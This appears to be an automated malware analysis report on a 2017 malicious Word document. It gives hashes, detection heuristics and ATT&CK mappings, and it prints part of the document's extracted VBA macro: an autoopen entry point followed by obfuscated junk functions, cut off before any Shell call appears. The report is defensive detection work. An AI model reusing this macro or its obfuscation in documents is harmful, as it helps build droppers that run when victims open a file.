Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bf11e4a6dab7de0d…

MALICIOUS

Office (OLE)

77.8 KB First seen: 2017-11-13
MD5: 6b603d9f269248713a4a4e68694b293e SHA-1: d297bd5b6a2d6656418bc5da0b5f7daff912d879 SHA-256: bf11e4a6dab7de0d0634dc17ad0e4391ac5075db25e2a556224028eca83d8a93
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is an OLE document containing a VBA macro. The macro is triggered by the 'autoopen' function and utilizes a Shell() call, indicating an attempt to execute arbitrary commands. This is strongly suggestive of a downloader or dropper functionality, where the macro is used to fetch and execute a secondary stage payload. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further supports this assessment.

Heuristics 7

  • ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11672 bytes
SHA-256: 319123e9baf03c9d8af2ec2707b73e5682ce5099c0f3c07b4cbbc4b4881513b0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub autoopen()
RZwZYPM
End Sub

Function kNCwPPkFd()
Dim GutFDFNybds(8089)
GutFDFNybds(6809) = 4589 + 1558 + 9452 + 314 / 9108 - 6266 - 5810 + 1955 + 8037 + 3406
 GutFDFNybds(5117) = 5332 + 2554 / 752 - 2938 - 4055 - 8779 + 3274 + 9423
GutFDFNybds(4342) = sHVnYaZuR
 GutFDFNybds(2382) = UfNMzVwuM
 GutFDFNybds(557) = xLdSpLf
 GutFDFNybds(629) = vTTKYGKmuv
 GutFDFNybds(2795) = CrmBcuvWC
 GutFDFNybds(2405) = exEBCkAL
 GutFDFNybds(4451) = pgGHFPYZdy
 GutFDFNybds(2122) = gVxXHMhTM
 GutFDFNybds(5029) = nTMxXxtDL
 GutFDFNybds(3250) = cKcpvXG
 GutFDFNybds(3999) = FxMPYCNRWe
End Function
Function gkCetzrWsg()
Dim zvDNUZB(1233)
zvDNUZB(595) = 1250 + 7842 + 986 + 4530 / 4970 / 9908 - 7757 - 3381 - 2163 + 4944
zvDNUZB(975) = tRsMZML
 zvDNUZB(572) = TDYFhcgKE
 zvDNUZB(709) = bMxWLzh
 zvDNUZB(262) = vZVpxwdDxev
 zvDNUZB(228) = XwwERktFf
 zvDNUZB(81) = FttyLXGgdKD
 zvDNUZB(332) = MkdhmBUTY
 zvDNUZB(684) = vSCCfPHfr
 zvDNUZB(806) = WXpAhFrxnd
 zvDNUZB(975) = PtHxpePczMs
 zvDNUZB(301) = CDLgXUKry
 zvDNUZB(182) = UXMuYDaW
 zvDNUZB(184) = BpCsfEcnZ
 zvDNUZB(158) = DfktxzuL
 zvDNUZB(303) = SvVSrGyauu
 zvDNUZB(489) = MfmLRttRGDk
 zvDNUZB(180) = fgFFvVrze
 zvDNUZB(576) = EMZSGKM
 zvDNUZB(535) = gACHwUa
 zvDNUZB(761) = SHpTxZGK
 zvDNUZB(644) = KbzdzhnNBZy
 zvDNUZB(1105) = XfyPudbBNNM
End Function
Function hzvmYnYUkw()
Dim yyPnEeM(6298)
yyPnEeM(4531) = 1341 + 2750 + 173 + 3719 / 9165 / 2484 / 9892 - 2361 + 9574 + 6019
 yyPnEeM(456) = 8690 + 3942 + 2354 + 1958 / 1337 - 6160 + 2528 + 5271 + 4760
 yyPnEeM(2204) = 1384 + 4612 + 9186 + 9240 / 2710 / 4006 - 3565 + 7032
yyPnEeM(3336) = ynLcTsuK
 yyPnEeM(1822) = kuugbMCnpa
 yyPnEeM(1442) = gDPKYpefhfx
 yyPnEeM(2591) = uXAXDsZDDBn
 yyPnEeM(2934) = LUrwbKrVfF
 yyPnEeM(2858) = dpeycnMTM
 yyPnEeM(2780) = dRzuUFD
 yyPnEeM(1901) = eGYpXwg
 yyPnEeM(2508) = DyDFpzM
 yyPnEeM(4870) = VhAUkzxha
 yyPnEeM(135) = FyUaYZS
 yyPnEeM(1148) = YyMmyhecM
 yyPnEeM(2157) = YYzMytSzB
 yyPnEeM(5411) = WApKTcg
 yyPnEeM(2093) = PDwYmkgPCer
 yyPnEeM(2462) = AhpxSZeNwZs
 yyPnEeM(3939) = HrNECVA
 yyPnEeM(1683) = rZPUdnYssP
 yyPnEeM(509) = dtnWNFbSr
 yyPnEeM(4444) = BfxMzwg
 yyPnEeM(5914) = mprHLXwTCyc
 yyPnEeM(4473) = bbcKDBxKh
 yyPnEeM(4062) = eZPPGHpFB
 yyPnEeM(1949) = ueRzgKEk
 yyPnEeM(2535) = vVwXdDwuVp
 yyPnEeM(923) = TAMTGzRPa
End Function
Function KkKDUAzcSw()
Dim ngeCtBrdPp(5921)
ngeCtBrdPp(1921) = 6442 + 3737 + 4511 + 458 / 6750 / 6084 / 2051 - 7772 - 9783 + 4888
 ngeCtBrdPp(3344) = 4180 + 4804 + 628 / 4315 / 7064 / 7425 - 5411 + 3106 + 3633
 ngeCtBrdPp(3515) = 4628 + 5814 + 8777 / 960 / 7435 - 9440 + 5848 + 5007 + 3155
ngeCtBrdPp(5548) = DzwvmaYBu
 ngeCtBrdPp(5615) = btDwYCHU
 ngeCtBrdPp(4139) = NzbytHV
 ngeCtBrdPp(3241) = swrDKwrtL
 ngeCtBrdPp(3078) = VXpHRpU
 ngeCtBrdPp(2615) = pKprMaSe
 ngeCtBrdPp(954) = WYBvzXcc
 ngeCtBrdPp(919) = vFtVCczS
 ngeCtBrdPp(2432) = UwrbAZtUSE
 ngeCtBrdPp(1307) = ptawGGZTeyk
 ngeCtBrdPp(3512) = TemDwAh
 ngeCtBrdPp(2411) = KTfLESnWhY
 ngeCtBrdPp(5264) = szwrFKdBE
 ngeCtBrdPp(4510) = ryrTWZFNuz
 ngeCtBrdPp(1609) = TMGMsmaMGa
 ngeCtBrdPp(4054) = zkTrhfwxp
 ngeCtBrdPp(4184) = EsEULEhrG
 ngeCtBrdPp(5510) = hYbMcXxZKfX
 ngeCtBrdPp(767) = fnsRHMvnRBa
 ngeCtBrdPp(4645) = kHtsCWm
 ngeCtBrdPp(99) = xvwrLRvVT
 ngeCtBrdPp(1167) = dNcmgHngS
 ngeCtBrdPp(5840) = wTUfXsam
 ngeCtBrdPp(5655) = dBuxdDDYf
End Function
Function ZtBSGbLzXHa()
Dim XgnefYfX(9516)
XgnefYfX(1806) = 4020 + 3310 + 5251 + 793 / 1338 / 1485 / 6297 - 8729 - 7367 + 7712
 XgnefYfX(6509) = 4789 + 9467 / 7692 / 2109 - 5593 - 7409 + 264 + 1815 + 9196
XgnefYfX(5975) = XUMzkLWpc
 XgnefYfX(3632) = nAsuaDm
 XgnefYfX(9384) = fDUkuEeFbTC
 XgnefYfX(1556) = ZESzdUFxPnt
 XgnefYfX(6100) = abnKyfSyc
 XgnefYfX(7632) = LuCUcUywe
 
... (truncated)